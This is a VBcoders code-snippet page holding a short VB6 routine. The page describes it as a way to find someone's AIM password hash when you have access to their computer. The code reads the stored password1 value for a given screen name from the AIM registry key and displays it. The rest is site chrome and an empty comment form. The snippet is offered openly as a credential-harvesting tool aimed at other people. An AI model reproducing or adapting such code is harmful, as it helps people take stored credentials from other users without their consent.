VBcoders Guest



Don't have an account yet? Register
 


Forgot Password?



This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com

by Matt Gilberg (1 Submission)
Category: Miscellaneous
Compatability: VB 6.0
Difficulty: Unknown Difficulty
Originally Published: Sat 28th August 2004
Date Added: Mon 8th February 2021
Rating: (1 Votes)

This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their computer. It goes in to the registry and finds

Rate This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com



Private Sub Command1_Click()
Dim sn As String
sn = Text2.Text
Set wshshell = CreateObject("WScript.Shell")
Text1.Text = wshshell.RegRead("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" + sn + "\Login\password1")
End Sub

Download this snippet    Add to My Saved Code

This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com Comments

No comments have been posted about This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com. Why not be the first to post a comment about This code is used to find someones AIM (AOL Instant Messenger) hash if you have access to their com.

Post your comment

Subject:
Message:
0/1000 characters